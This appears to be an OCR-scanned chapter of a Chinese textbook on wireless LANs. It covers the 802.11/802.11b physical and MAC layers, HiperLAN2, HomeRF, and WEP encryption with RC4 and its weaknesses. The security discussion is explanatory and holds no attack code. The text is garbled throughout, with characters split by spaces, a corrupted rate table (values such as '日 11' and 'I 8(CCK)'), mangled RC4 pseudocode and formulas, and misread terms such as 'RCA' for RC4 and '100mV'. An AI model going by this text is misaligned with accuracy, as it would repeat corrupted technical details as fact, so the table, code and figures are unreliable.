一 个 调频 的 模式 ,数据 则 按照 这 个 序列 在 各 个 子 频道 上 进行 传送 ,每 次 在 802. 11 网 络 上 进 
行 的 会 话 都 可 能 采用 了 一 种 不 同 的 跳 频 模式 ,采用 这 种 跳 频 方式 主要 是 为 了 避免 两 个 发 送 
端 同 时 采用 同一 个 子 频段 。 

FHSS 技术 采用 的 方式 较为 简单 ,这 也 限制 了 它 所 能 获得 的 最 大 传输 速度 不 能 大 于 
2Mbps, 这 个 限制 主要 是 受 FCC 规定 的 子 频道 的 划分 不 得 小 于 1MHz 的 影响 。 这 个 限制 使 
得 FHSS 必须 在 2. 4GHz 整个 频段 内 经 常 性 跳 频 , 带 来 了 大 量 的 跳 频 上 的 开销 。 

与 FHSS 相反 的 是 ,直接 序列 扩 频 技术 将 2. 4GHz 的 频 宽 划分 为 14 个 22MHz 的 通道 
(Channel) ,临近 的 通道 互相 重 全 ,在 14 个 频段 内 ,只 有 3 个 频段 是 互相 不 覆盖 的 ,数据 就 是 
从 这 14 个 频段 中 的 一 个 中 进行 传送 而 不 需要 进行 频道 之 间 的 跳跃 。 为 了 弥补 特定 频段 中 
的 噪声 开销 ,一 项 称 为 “Chipping” 的 技术 被 用 来 解决 这 个 问题 。 在 每 个 22MHz 通道 中 传输 
的 数据 中 的 数据 都 被 转化 成 一 个 带 元 余 校 验 的 Chips 数据 , 它 和 真实 数据 一 起 进行 传输 用 
来 提供 错误 校 验 和 纠 错 。 由 于 使 用 了 这 项 技术 ,大 部 分 传送 错误 的 数据 也 可 以 进行 纠 错 而 
不 需要 重 传 ,这 就 增加 了 网 络 的 吞吐 量 。 

3. IEEE 802. 11b 的 增强 物理 层 


802. 11b 在 无 线 局 域 网 协议 中 最 大 的 贡献 就 在 于 它 在 802. 11 协议 的 物理 层 增 加 了 两 
个 新 的 速度 : 5. 5Mbps 和 11Mbps。 为 了 实现 这 个 目标 ,DSSS 被 选 作 该 标准 唯一 的 物理 层 
传输 技术 ,这 是 由 于 FHSS 在 不 违反 FCC 原则 的 基础 上 无 法 再 提高 速度 了 。 这 个 决定 使 得 
802. 11b 能 在 1Mbps 和 2Mbps 速率 上 和 802. 11 的 DSSS 系统 互 操作 ,但 是 无 法 在 1Mbps 
和 2Mbps 的 FHSS 系统 一 起 工作 。 

在 802. 11b 标准 中 ,一 种 更 先进 的 编码 技术 被 采用 了 ,在 这 个 编码 技术 中 ,抛弃 了 原 有 
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的 11 位 Barker 序列 技术 ,而 采用 了 CCK(Complementary Code Keying) 技 术 , 它 的 核心 编 
码 中 有 一 个 64 个 8 位 编码 组 成 的 集合 ,在 这 个 集合 中 的 数据 有 特殊 的 数学 特性 ,使 得 他 们 
能 够 在 经 过 干扰 或 者 由 于 反射 造成 的 多 方 接收 问题 后 还 能 够 被 正确 地 互相 区 分 。5. 5Mbps 
使 用 CCK 串 来 携带 4 位 的 数字 信息 ,而 11Mbps 的 速率 使 用 CCK 串 来 携带 8 位 的 数字 信 
息 。 两 个 速率 的 传送 都 利用 QPSK 作为 调制 的 手段 ,不 过 信号 的 调制 速率 为 1. 375MSps。 
这 也 是 802. 11b 获得 高 速 的 机 理 。 表 9-1 中 列举 了 这 些 数据 。 
表 9-1 802. 11b 编码 技术 数据 传送 速率 规范 
数据 传送 速率 / (Mb * s-') 编码 长 度 调制 方式 波 串 速率 /(Ms * s-') 位 数 / 波 串 


日 11 (BS 串 ) BPSK 册 3 
2 11 (BS 串 ) QPSK 1 2 
5.5 8(CCK) QPSK 1.375 4 
I 8(CCK) QPSK 1.375 8 


为 了 支持 在 有 噪声 的 环境 下 能 够 获得 较 好 的 传输 速率 ,802. 11b 采用 了 动态 速率 调节 
技术 ,来 允许 用 户 在 不 同 的 环境 下 自动 使 用 不 同 的 连接 速度 来 补充 环境 的 不 利 影响 。 在 理 
想 状态 下 ,用户 以 11Mbps 的 全 速 运行 ,然而 , 当 用 户 移出 理想 的 11Mbps 速率 传送 的 位 置 
或 者 距离 时 ,或 者 潜在 地 受到 了 干扰 的 话 ,就 把 速度 自动 按 序 降低 为 5. 5Mbps、2Mbps、 
1Mbps。 同 样 , 当 用 户 回 到 理想 环境 的 话 ,连接 速度 也 会 以 反 向 增加 直至 11Mbps。 速 率 调 
节 机 制 是 在 物理 层 自动 实现 而 不 会 对 用 户 和 其 他 上 层 协 议 产生 任何 影响 。 

4. IEEE 802. 11 数字 链 路 层 

802. 11 的 数据 链 路 层 由 两 个 子 层 构成 : 逻辑 链 路 层 (Logic Link Control,LLC) 和 媒体 
控制 层 (Media Access Control,MAC)。802. 11 使 用 和 802. 2 完全 相同 的 LLC 子 层 和 802 
协议 中 的 48 位 MAC 地 址 ,这 使 得 无 线 和 有 线 之 间 的 桥接 非常 方便 。 但 是 MAC 地 址 只 对 
无 线 局 域 网 唯一 。 

802.11 的 MAC 和 802. 3 协议 的 MAC 非常 相似 ,都 是 在 一 个 共享 媒体 上 支持 多 个 用 
户 共 享 资源 ,由 发 送 者 在 发 送 数据 前 先进 行 网 络 的 可 用 性 。 在 802. 3 协议 中 ,是 由 一 种 称 为 
CSMA/CD(Carrier Sense Multiple Access with Collision Detection) 的 协议 来 完成 调节 的 ， 
这 个 协议 解决 了 在 Ethernet 上 的 各 个 工作 站 如 何在 线 缆 上 进行 传输 的 问题 ,利用 它 检 测 和 
避免 当 两 个 或 两 个 以 上 的 网 络 设 备 需要 进行 数据 传送 时 网 络 上 的 冲突 。 在 802. 11 无 线 局 
域 网 协议 中 ,冲突 的 检测 存在 一 定 的 问题 ,这 个 问题 称 为 “Near/Far” 现 象 ,这 是 由 于 要 检测 
冲突 ,设备 必须 能 够 一 边 接 收 数据 信号 一 边 传 送 数 据 信号 ,而 这 在 无 线 系统 中 是 无 法 办 
到 的 。 

鉴于 这 个 差异 ,在 802. 11 中 对 CSMA/CD 进行 了 一 些 调整 ,采用 了 新 的 协议 CSMA/ 
CA (Carrier Sense Multiple Access with Collision Avoidance) 或 者 DCF (Distributed 
Coordination Function)。CSMA/CA 利用 ACK 信号 来 避免 冲突 的 发 生 , 也 就 是 说 ,只 有 当 
客户 端 收 到 网 络 上 返回 的 ACK 信号 后 才 确 认 送 出 的 数据 已 经 正确 到 达 目 的 地 。 

CSMA/CA 协议 的 工作 流程 是 : 一 个 工作 站 希望 在 无 线 网 络 中 传送 数据 ,如 果 没 有 探 
测 到 网 络 中 正在 传送 数据 , 则 附加 等 待 一 段 时 间 , 再 随机 选择 一 个 时 间 片 继续 探测 ; 如 果 无 
线 网 路 中 仍旧 没有 活动 的 话 , 就 将 数据 发 送出 去 。 接 收 端 的 工作 站 如 果 收 到 发 送 端 送出 的 
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完整 的 数据 , 则 会 发 一 个 ACK 数据 报 ,如 果 这 个 ACK 数据 报 被 接收 端 收 到 , 则 这 个 数据 发 
送 过 程 完 成 ; 如 果 发 送 端 没 有 收 到 ACK 数据 报 , 则 或 者 发 送 的 数据 没有 被 完整 地 收 到 ,或 
者 ACK 信和 号 的 发 送 失败 ,不 管 是 哪 种 现象 发 生 , 数 据 报 都 在 发 送 端 等 待 一 段 时 间 后 被 
重 传 。 

CSMA/CA 通过 这 种 方式 来 提供 无 线 的 共享 访问 ,这 种 显示 的 ACK 机 制 在 处 理 无 线 
问题 时 非常 有 效 。 然 而 不 管 是 对 于 802. 11 还 是 802. 3 来 说 ,这 种 方式 都 增加 了 额外 的 
负担 。 

另 一 个 无 线 MAC 层 的 问题 是 “hidden node” 问 题 。 两 个 相反 的 工作 站 利用 一 个 中 心 接 
入 点 进行 连接 ,这 两 个 工作 站 都 能 够 “ 听 ” 到 中 心 接 入 点 的 存在 ,而 互相 之 间 则 可 能 由 于 障碍 
或 者 距离 原因 无 法 感知 到 对 方 的 存在 。 为 了 解决 这 个 问题 ,802. 11 在 MAC 层 上 引入 了 一 
个 新 的 RTS/CTS(Send/Clear To Send) 选 项 , 当 这 个 选项 打开 后 ,一 个 发 送 工 作 站 传送 一 
个 RTS 信号 ,随后 等 待 访问 接 入 点 回 送 RTS 信号 ,由 于 所 有 的 网 络 中 的 工作 站 能 够 “ 听 ” 到 
访问 接 人 点 发 出 的 信号 ,因此 CTS 能 够 让 它们 停止 传送 数据 。 这 样 发 送 端 就 可 以 发 送 数 据 
和 接收 ACK 信号 而 不 会 造成 数据 的 冲突 ,这 就 间接 解决 了 “hidden node” 问 题 。 由 于 RTS/ 
CTS 需要 占用 网 络 资源 而 增加 了 额外 的 网 络 负担 ,一 般 只 是 在 那些 大 数据 报 上 采用 ( 重 传 
大 数据 报 会 耗费 较 大 ) 。 

最 后 ,802. 11MAC 子 层 提供 了 另 两 个 强壮 的 功能 , 即 CRC 校 验 和 包 分 片 。 在 802. 11 
协议 中 ,每 一 个 在 无 线 网 络 中 传输 的 数据 报 都 被 附加 上 了 校 验 位 以 保证 它 在 传送 的 时 候 没 
有 出 现 错误 ,这 和 Ethernet 中 通过 上 层 TCP/IP 协议 来 对 数据 进行 校 验 有 所 不 同 。 包 分 片 
的 功能 允许 大 的 数据 报 在 传送 的 时 候 被 分 成 较 小 的 部 分 分 批 传送 。 这 在 网 络 十 分 拥挤 或 者 
存在 干扰 的 情况 下 (大 数据 报 在 这 种 环境 下 传送 非常 容易 遭 到 破坏 ) 是 一 个 非常 有 用 的 特 
性 。 这 项 技术 大 大 减少 了 许多 情况 下 数据 报 被 重 传 的 概率 ,从 而 提高 了 无 线 网 络 的 整体 性 
能 。MAC 子 层 负 责 将 收 到 的 被 分 片 的 大 数据 报 进 行 重 新 组 装 , 对 于 上 层 协 议 这 个 分 片 的 
过 程 是 完全 透明 的 。 


9.2.2 ETSI 的 HiperLAN2 


1， HiperLAN2 简介 

HiperLAN 是 欧洲 电信 标准 学 会 (European Telecom Standards Institute, ETSI) 的 
RES10 工作 组 在 1992 年 提出 的 一 个 WLAN 标准 , HiperLAN2 是 它 的 后 续 版 本 ， 
HiperLAN2 部 分 建立 在 GSM 基础 上 ,使 用 频段 为 5GHz。 在 物理 层 上 HiperLAN2 和 
802. 11a 几乎 完全 相同 : 它 采 用 OFDM 技术 ,最 大 数据 速率 为 54Mbps, 实 际 应 用 吞吐 率 最 
低 也 能 保持 在 20Mbps 左右 ,为 视频 和 话音 一 类 的 实时 应 用 提供 了 新 的 途径 。 它 和 802. 11a 
最 大 的 不 同 是 HiperLAN2 不 是 建立 在 以 太 网 基础 上 的 ,而 是 采用 的 TDMA 结构 ,形成 一 
个 面向 连接 的 网 络 , 其 传输 结构 能 够 对 多 种 类 型 的 网 络 基础 结构 (包括 以 太 网 .IP、.ATM 和 
PPP) 提 供 连 接 , 而 且 对 每 一 种 连接 都 具有 安全 认证 和 加 密 功 能 。HiperLAN2 的 面向 连接 
的 特性 使 它 很 容易 满足 QoS 要 求 ,可 以 为 每 个 连接 分 配 一 个 指定 的 QoS, 确 定 这 个 连接 在 
带宽 延迟、 拥塞 、 比 特 错误 率 等 方面 的 要 求 。 这 种 QoS 支持 与 高 传输 速率 一 起 保证 了 不 同 
的 数据 序列 (如 视频 .话音 和 数据 等 ) 可 以 同时 进行 高 速 传输 ,将 开辟 如 视频 信号 分 配 到 家 庭 
等 多 种 全 新 的 应 用 业务 。 
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HiperLAN2 虽然 在 技术 上 有 优势 ,然而 它 在 开发 过 程 中 却 落 在 802. 11a 的 后 面 ,不 过 
因为 它 是 欧洲 的 标准 ,所 以 一 直 得 到 欧洲 政府 的 支持 。 尤 其 在 频率 规划 上 ,因为 它 使 用 的 波 
段 和 802. 11a 相同 ,许多 投资 商 一 直 在 游说 欧洲 政府 ,希望 802. 11a 也 能 在 HiperLAN2 波 
段 使 用 ,IEEE 也 正在 开发 一 个 可 以 将 两 种 5GHz 系统 统一 起 来 的 标准 。 

2. HiperLAN2 的 主要 特点 

第 一 是 高 速 数据 传输 。HiperLAN2 具有 很 高 的 传输 速率 ,物理 层 最 高 可 达 54Mbps， 
网 络 层 可 达 32Mbps。 为 了 达到 这 样 的 要 求 , HiperLAN2 采用 了 正 交 频 分 复 用 (OFDM) 的 
调制 技术 。OFDM 已 经 被 证 明 非常 适合 工作 于 多 径 环 境 中 ,如 楼 群 之 间或 办 公 室 内 部 。 在 
物理 层 之 上 的 媒体 接 人 控制 (MAC) 子 层 有 别 于 以 往 的 CSMA 及 其 改进 方式 ,而 采用 一 种 
动态 时 分 复 用 的 技术 来 保证 最 有 效 地 利用 无 线 资 源 。 

第 二 是 面向 链接 的 机 制 。 在 HiperLAN2 中 ,数据 是 通过 MT 和 AP 之 间 事 先 建立 的 
信 令 链接 来 进行 传输 的 ,该 链接 通过 空中 接口 实现 时 分 复 用 。 有 两 种 链接 类 型 , 即 点 到 点 与 
点 到 多 点 。 前 者 是 双向 的 ; 而 后 者 通常 为 下 行 的 单 向 链接 ,多 用 于 组 播 。 另 外 ,每 一 个 AP 
还 有 一 条 专用 的 广播 信道 用 于 向 其 所 属 的 所 有 MT 下 发 广播 信息 。 

第 三 是 QoS 支持 。 面 向 链接 的 特点 使 HiperLAN2 可 以 很 容易 地 实现 QoS 支持 ,每 个 
链接 可 以 被 指定 一 个 特定 的 QoS, 如 带宽 、 时 延 , 误 码 率 等 ; 也 可 以 给 每 个 链接 预先 指定 一 
个 优先 级 。QoS 保障 加 上 高 速率 的 数据 传输 使 得 该 系统 非常 适合 于 同步 地 传输 多 媒体 数 
据 流 ,包括 话音 ,视频 和 数据 。 

第 四 是 自动 频率 分 配 。 在 HiperLAN2 中 ,不 需要 像 GSM 网 那样 进行 人 工 的 频率 分 
配 。 每 个 AP 都 会 在 其 覆盖 范围 内 选择 最 合适 的 无 线 信道 。AP 在 工作 的 过 程 中 同时 监听 
环境 干扰 信息 和 邻近 的 其 他 AP, 进 而 根据 无 线 信 道 是 否 被 其 他 AP 占用 和 环境 干扰 最 小 化 
的 原则 选择 合适 的 信道 。 自 动 频率 分 配 是 HiperLAN2 最 大 的 特色 。 

第 五 是 安全 性 支持 。HiperLAN2 网 络 支持 鉴 权 和 加 密 。 通 过 鉴 权 ,使 得 只 有 合法 的 用 
户 可 以 接 入 网 络 ,而 且 只 能 接 入 通过 鉴 权 的 有 效 网 络 。 而 无 线 网 络 由 于 固有 的 开放 性 ,其 安 
全 性 通常 远 不 如 有 线 网 络 ,因此 在 业务 流 上 进行 加 密 是 目前 一 种 较为 有 效 的 安全 手段 。 

第 六 是 移动 性 支持 。 在 HiperLAN2 中 ,MT 必须 通过 “最 近 ” 的 AP, 或 者 说 信 噪 比 最 
高 的 AP 来 收发 数据 。 因 此 当 MT 移动 时 ,必须 随时 监测 附近 的 AP, 一 旦 发 现 其 他 AP 有 
比 当 前 AP 更 好 的 传输 性 能 ,就 请 求 切换 。 切 换 之 后 ,所 有 已 经 建立 的 链接 将 转移 到 新 的 
AP 之 上 。 在 切换 过 程 中 ,通信 不 会 发 生 中 断 , 但 一 定数 量 的 丢 包 是 允许 的 。 如 果 MT 离开 
了 无 线材 盖 区 域 一 定 的 时 间 , 它 将 丧失 与 HiperLAN2 网 络 的 联系 并 释放 所 有 链接 。 

第 七 是 网 络 与 应 用 的 独立 性 。HiperLANz2 的 协议 栈 具有 很 大 的 灵活 性 ,可 以 适应 多 种 
固定 网 络 类 型 。 因 此 HiperLAN2 网 络 既 可 以 作为 交换 式 以 太 网 的 无 线 接 入 子 网 ,也 可 以 
作为 第 三 代 蜂 窜 网 络 的 接 入 网 ,并 且 这 种 接 入 对 于 网 络 层 以 上 的 用 户 部 分 来 说 是 完全 透明 
的 。 当 前 在 固定 网 络 上 的 任何 应 用 都 可 以 在 HiperLAN2 网 上 运行 。 相 比 之 下 ,IEEE 802. 11 
的 一 系列 协议 都 只 能 由 以 太 网 作为 支撑 :因此 这 种 高 度 的 灵活 性 也 是 HiperLAN2 的 特色 。 

第 八 是 节能 管理 。HiperLAN2 网 络 中 ,节能 管理 的 机 制 基于 MT 发 起 的 节能 请 求 。 
在 任何 时 刻 ,MT 都 可 以 向 AP 请 求 进入 低 功 耗 状态 或 休眠 期 。 针 对 不 同 的 需求 ,如 要 求 较 
短 等 待 时 间或 较 低 的 功率 ,可 以 采用 不 同 的 休眠 期 。 
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9.2.3 HomeRF 


HomeRF 工作 组 是 由 美国 家 用 射频 委员 会 于 1997 年 成 立 的 ,其 主要 工作 任务 是 为 家 
庭 用 户 建立 具有 互 操作 性 的 话音 和 数据 通信 网 。HomeRF 无 线 标准 是 由 HomeRF 工作 组 
开发 的 开放 性 行业 标准 ,基于 原始 的 802. 11 的 FHSS 版 本 。 顾名思义 ,HomeRF 是 为 家 庭 
网 络 设 计 的 射频 (Radio Frequency,;RF) ,是 一 种 在 家 中 的 PC 和 用 户 电子 设备 之 间 实 现 无 
线 数字 通信 的 开放 性 工业 标准 ,目的 是 在 家 庭 范围 内 ,使 计算 机 与 其 他 电子 设备 之 间 实 现 无 
线 通 信 。 它 推出 HomeRF 的 标准 集成 了 语音 和 数据 传送 技术 ,工作 频段 为 2. 4GHz, 数 据 
传输 速率 达到 100Mbps, 在 WLAN 的 安全 性 方面 主要 考虑 访问 控制 和 加 密 技术 。 

HomeRF 由 微软 英特尔 惠普、 摩托 罗拉 和 康 柏 等 公司 提出 ,使 用 开放 的 2. 4GHz 频 
段 , 采 用 跳 频 扩 频 技术 , 跳 频 速率 为 50 跳 / 秒 ,共有 75 个 宽带 为 IMHz 的 跳 频 信道 。 
HomeRF 基于 共享 无 线 接 人 协议 (Shared Wireless Access Protocol,SWAP)。SWAP 使 用 
TDMA 十 CSMA/CA 方式 ,适合 语音 和 数据 业务 。 在 进行 语音 通信 时 , 它 采 用 数字 增强 无 
强 电 话 (DECT) 标 准 ,DECT 使 用 TDMA 时 分 多 址 技术 ,适合 于 传送 交互 式 语 音 和 其 他 时 
间 人 敏感 性 业务 。 在 进行 数据 通信 时 它 采 用 IEEE 802. 11 的 CSMA/CA,CSMA/CA 适合 于 
传送 高 速 分 组 数据 。HomeRF 的 最 大 功率 为 100mV, 有 效 范围 为 50m。 调 制 方式 分 为 
2FSK 和 4FSK 两 种 ,在 2FSK 方式 下 ,最 大 的 数据 传输 速率 为 1Mbps; 在 4FSK 方式 下 , 速 
率 可 达 2Mbps。 

HomeRF 是 对 现 有 无 线 通信 标准 的 综合 和 改进 : 当 进行 数据 通信 时 ,采用 IEEE 802. 11 
规范 中 的 TCP/IP 传输 协议 ; 当 进行 语音 通信 时 , 则 采用 数字 增强 型 无 绳 通信 标准 。 但 是 ， 
该 标准 与 802. 11b 不 兼容 ,并 占据 了 与 802. 11b 和 Bluetooth 相同 的 2. 4GHz 频率 段 , 所 以 
在 应 用 范围 上 会 有 很 大 的 局 限 性 ,更 多 的 是 在 家 庭 网 络 中 使 用 。 

HomeRF 的 特点 是 : 安全 可 靠 ,成 本 低廉 ,简单 易 行 ; 不 受 墙壁 和 楼 层 的 影响 ; 传输 交 
互 式 语音 数据 采用 TDMA 技术 ,传输 高 速 数据 分 组 则 采用 CSMA/CA 技术 ; 无 线 电 干 扰 
影响 小 ; 支持 流 媒 体 。 但 其 推广 一 直 不 力 , 目 前 已 基本 退出 历史 舞台 。 


9.3 无 线 局 域 网 安全 协议 


为 解决 无 线 局 域 网 络 安全 问题 ,网 络 安全 专家 先后 提出 了 有 线 等 效 保密 (Wired 
Equivalent Privacy, WEP) 方 案 ; 过 渡 期 间 的 Wi-Fi 保护 存 取 (Wi-Fi Protected Access， 
WPA) 标 准 和 已 成 为 新 标准 的 802. 11i; 我 国 在 2003 年 5 月 提出 的 无 线 局 域 网 鉴别 和 保密 
基础 结构 (WLAN Authentication and Privacy Infrastructure, WAPI ) 国 家 标准 GB 15629. 11 。 
现在 ,无 线 局 域 网 络 安全 已 经 得 到 很 大 程度 的 改善 ,但 是 要 真正 构建 端 到 端的 安全 无 线 网 络 
依然 任重道远 。 


9.3.1 WEP 协议 


1. WEP 简介 
在 1999 年 通过 的 IEEE 802. 11 标准 中 的 WEP (Wired Equivalent Privacy) 协 议 是 
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IEEE 802. 11b 协议 中 最 基本 的 无 线 安 全 加 密 措 施 , 其 主要 用 途 包括 : 提供 接 入 控制 ,防止 
未 授权 用 户 访问 网 络 ; 对 数据 进行 加 密 , 防 止 数据 被 攻击 者 窃听 ; 防止 数据 被 攻击 者 中 途 
恶意 算 改 或 伪造 。 此 外 , WEP 也 提供 认证 功能 , 当 加 密 机 制 功能 启用 ,客户 端 要 尝试 连接 上 
AP 时 ,AP 会 发 出 一 个 Challenge Packet 给 客户 端 ,客户 端 再 利用 共享 密 钥 将 此 值 加 密 后 
送 回 存 取 点 以 进行 认证 比 对 ,如 果 正 确 无 误 , 才 能 获准 存 取 网 络 的 资源 。AboveCable 所 有 
型 号 的 AP 都 支持 64 位 或 (与 )128 位 的 静态 WEP 加密 ,有 效 地 防止 数据 被 窃听 盗用 。 

2. WEP 加 密 解 密 过 程 


WEP 为 等 效 加 密 , 即 加 密 和 解密 的 密 钥 相同 。 为 了 保护 数据 ,WEP 使 用 RCA 算法 来 
加 密 从 无 线 接 入 点 或 者 无 线 网 卡 发 送出 去 的 数据 包 。RCA 是 一 个 同步 流 式 加 密 系统 ,这 种 
加 密 机 制 将 一 个 短 密 钥 扩展 成 一 个 任意 长 度 的 伪 随 机 密 钥 流 ,发 送 端 再 用 这 个 生成 的 伪 随 
机 密 钥 流 与 报 文 进行 异 或 运算 ,产生 密 文 。 接 收 端 用 相同 的 密 钥 产生 同样 的 密 钥 流 ,并且 用 
这 个 密 钥 流 对 密 文 进行 异 或 运算 得 到 原始 报 文 。 从 图 9-3 中 可 以 看 到 ,发送 端 首先 计算 原 
始 数据 包 中 明文 的 32 位 CRC 循环 宛 余 校 验 码 ,也 就 是 计算 其 完整 性 校 验 值 (Integrity 
Check Value,ICV) ,然后 将 明文 与 校 验 码 一 起 构成 传输 载荷 。 在 发 送 端 和 无 线 接 人 点 AP 
之 间 共 享 一 个 密 钥 ,长 度 可 选 40 位 或 104 位 。 发 送 端 为 每 一 个 数据 包 选 定 一 个 长 度 为 24 
位 的 数 作为 初始 向 量 (Initialized Vector,IV) ,然后 将 IV 与 密 钥 连接 起 来 ,构成 64 位 或 128 
位 的 种 子 密 钥 , 再 送 入 RC4 的 伪 随 机 数 生 成 器 (Pseu-do-Random Number Generator， 
PRNG) 中 ,生成 与 传输 载荷 等 长 的 随机 数 ,该 随机 数 就 是 加 密 密 钥 流 。 最 后 将 加 密 密 钥 流 
与 传输 载荷 按 位 进行 异 或 操作 ,就 得 到 了 密 文 。 


IV 一 
| | 种 Reh 
密 钥 1 IV 
XOR 密 文 
明文 =| 
=| 完整 性 校 验 一 =| ICV 上 一 | | | 密 钥 流 


图 9-3 WEP 加 密 过 程 


接收 端的 解密 过 程 ,如 图 9-4 所 示 。 由 于 发 送 端 是 将 IV 以 明文 形式 和 密 文 一 起 发 送 
的 , 当 密 文 传送 到 AP 后 ,AP 从 数据 包 中 提取 出 IV 和 密 文 , 并 将 IV 和 自己 所 持 有 的 共享 
密 钥 一 起 送 入 伪 随 机 数 发 生 器 ,得 到 解密 密 钥 流 ,该 解密 密 钥 流 实 际 上 和 加 密 密 钥 流 是 相同 
的 。 然 后 接收 端 再 将 解密 密 钥 流 和 密 文 进行 异 或 运算 ,就 得 到 了 明文 ,将 明文 进行 CRC 计 
算 后 就 可 以 得 到 校 验 码 ICV 。 如 果 ICV 和 ICV 是 相等 的 ,那么 就 得 到 了 原始 明文 数据 , 否 
则 解密 就 失败 了 。 

3. WEP 协议 隐患 

由 于 WEP 采用 密 钥 长 度 可 变 的 RC4 流 密码 算法 来 保护 数据 传输 ,而 在 实际 应 用 中 , 密 
钥 经 常 基于 用 户 所 选择 的 密码 ,这 就 大 大 降低 了 密 钥 的 安全 有 效 长 度 。 一 些 计 算 机 安全 专 
家 已 经 发 现 了 危及 WLAN 安全 的 安全 隐患 。 

RC4 算法 属于 二 进 制 异 或 同步 流 密码 算法 ,其 密 钥 长 度 可 变 , 在 WEP 中 , 密 钥 长 度 可 
选择 128 位 或 64 位 。 
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密 钥 和 
| | 种 子 Reh 密 钥 流 
lV 上 一 ~ 
密 文 ~ XOR 
ICV=ICV > 
< ICV |- 一 | 完整 性 校 验 | | 


明文 一 
图 9-4 WEP 解密 过 程 


RC4 算法 由 伪 随 机 数 产 生 算法 (Pseudo Random Generation Algorithm,PRGA) 和 密 钥 
调度 算法 (Key Schedule Algorithm,KSA) 两 部 分 构成 。 其 中 ,PRGA 为 RC4 算法 的 核心 ， 
用 于 产生 与 明文 相 异 或 的 伪 随 机 数 序列 ; KSA 算法 的 功能 是 将 密 钥 映射 为 伪 随 机 数 发 生 
器 的 初始 化 状态 ,完成 RC4 算法 的 初始 化 。RC4 算法 实际 上 是 一 类 以 加 密 块 大 小 为 参数 的 
算法 。 这 里 的 参数 nn 为 RC4 算法 的 字 长 。 在 WEP 中 ,n= 二 8。RC4 算法 的 内 部 状态 包括 2” 
的 状态 表 和 两 个 大 小 为 一 个 字 的 计数 器 。 状 态 表 ,也 称 为 状态 盒 (S-box, 以 下 用 S 表 示 ), 用 
来 保存 2" 个 值 的 转 置 状 态 。 两 个 计数 器 分 别 用 i 和 j 表示 。KSA 算法 和 PRGA 算法 可 表 
示 如 下 : 


KSA: PRGA: 
Initialization: Initialization: 
For i=0 to2°-1 i=0,j=0 
S[i]=i Generation Loop: 
j=0 EE 从 训 1 
Scrambling: | 
For i=0 to2"—1 Swap (S[i],S[j]) 
J=j+S[i]+K[I mod 1] output z= S[S[i] + S[j]] 
Swap(S[i], S[j]) 


其 中 ,1 为 密 钥 的 长 度 。 

仔细 研究 RC4 的 算法 流程 ,不 难 发 现 : 状态 盒 S 从 一 个 统一 的 2” 个 字 的 转 置 开始 ,对 
其 进行 的 唯一 操作 是 交换 。S 终 保存 2" 的 某 个 转 置 状 态 ,而 且 转 置 随 着 时 间 而 更 新 。 这 也 
是 RC4 算法 的 强度 所 在 。 算 法 的 内 部 状态 存储 在 M 一 22" 十 2" 比特 中 ,由 于 S 为 一 个 转 置 ， 
此 状态 大 约 保存 了 log:(2n!1) 十 2ns*1700 位 的 信息 。 状 态 盒 的 初始 化 状态 仅仅 依赖 于 加 密 
密 钥 K, 因 此 , 若 已 知 加 密 密 钥 就 可 完全 破解 RC4。 加 密 密 钥 完全 且 唯 一 确定 了 伪 随 机 数 序 
列 , 相 同 的 密 钥 总 是 产生 相同 的 序列 。 另 外 ,RC4 算法 本 身 并 不 提供 数据 完整 性 校 验 功 能 ， 
此 功能 的 实现 必须 由 其 他 方法 实现 (例如 WEP 中 的 数据 完整 性 校 验 向 量 , 即 ICV)。 下 面 
考虑 一 些 特殊 的 攻击 模型 ,这 些 模型 均 与 要 讨论 的 RC4 的 安全 问题 密切 相关 。 

RC4 算法 属于 同步 流 密 码 算 法 中 的 一 种 ,由 于 其 伪 随 机 数 发 生 器 (Pseudo Random 
Number Generator,PRNG) 的 输出 完全 由 加 密 密 钥 确定 ,因此 对 于 一 个 设计 良好 的 流 密码 
算法 必须 满足 两 个 条 件 : 输出 的 每 个 比特 应 该 依赖 于 所 有 加 密 密 钥 的 所 有 比特 ; 而 且 任 意 
一 个 比特 或 者 某 些 比 特 同 加 密 密 钥 之 间 的 关系 应 该 极其 复杂 。 上 述 第 一 个 条 件 意味 着 输出 
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的 每 个 比特 依赖 于 加 密 密 钥 所 有 比特 的 值 。 密 钥 中 任意 比特 值 的 改变 均 有 1/2 的 概率 影响 
到 输出 的 每 一 个 比特 。 如 果 满 足 此 条 件 ,那么 ,破解 此 加 密 需 要 尝试 所 有 可 能 的 密 钥 值 , 输 
出 值 同 加 密 密 钥 之 间 几 乎 不 存在 任何 联系 。 如 果 上 面 的 条 件 得 不 到 满足 ,那么 就 可 被 利用 
来 对 其 进行 攻击 。 举 例 来 说 ,假设 输出 的 某 8 个 比特 仅仅 依赖 于 加 密 密 钥 的 某 8 个 比特 , 那 
么 就 可 以 简单 地 进行 对 此 8 个 比特 密 钥 的 所 有 可 能 值 进行 尝试 ,并 与 实际 输出 相 比较 获取 
此 8 个 比特 密 钥 的 值 , 这 样 就 大 大 降低 了 穷 举 攻击 所 需 的 计算 量 。 因 此 ,如 果 输 出 以 比较 高 
的 概率 由 密 钥 的 某 些 比特 所 确定 ,那么 此 信息 就 可 被 利用 来 对 此 流 密 码 进行 攻击 。 

第 二 个 条 件 意 味 着 即使 已 知 两 个 加 密 密 钥 之 间 的 联系 ,也 无 法 得 出 PRNG 输出 之 间 的 
联系 。 此 信息 也 可 用 来 降低 穷 举 攻击 的 搜索 空间 ,从 而 导致 加 密 强度 的 降低 。 

RC4 算法 属于 二 进 制 异 或 流 密码 ,相同 的 密 钥 总 是 产生 相同 的 PRNG 输出 。 为 解决 密 
钥 重 用 的 问题 ,WEP 中 引入 了 初始 化 向 量 (Initialization Vector,IV)。 初 始 化 向 量 为 一 随 
机 数 , 每 次 加 密 时 随机 产生 。 初 始 化 向 量 以 某 种 形式 与 原 密 钥 相 组 合 , 作 为 此 次 加 密 的 加 密 
密 钥 。 由 于 IV 并 不 属于 密 钥 的 一 部 分 ,因此 无 须 保 密 , 多 以 明文 传输 。 虽 然 初 始 化 向 量 的 
使 用 很 好 地 解决 了 密 钥 重用 的 问题 ,然而 初始 化 向 量 的 使 用 将 导致 严重 的 安全 隐患 。 而 且 
在 WEP 协议 的 身份 认证 中 ,规定 的 身份 认证 是 单 向 的 , 即 AP 对 申请 接 入 的 客户 端 进行 身 
份 认证 ,而 客户 端 并 不 对 AP 进行 身份 认证 。 这 种 单 向 的 身份 认证 方式 导致 了 假冒 的 AP 
的 存在 。 

此 外 ,在 WEP 协议 身份 认证 过 程 中 ,AP 以 明文 的 形式 把 128 字 节 的 随机 序列 流 发 送 
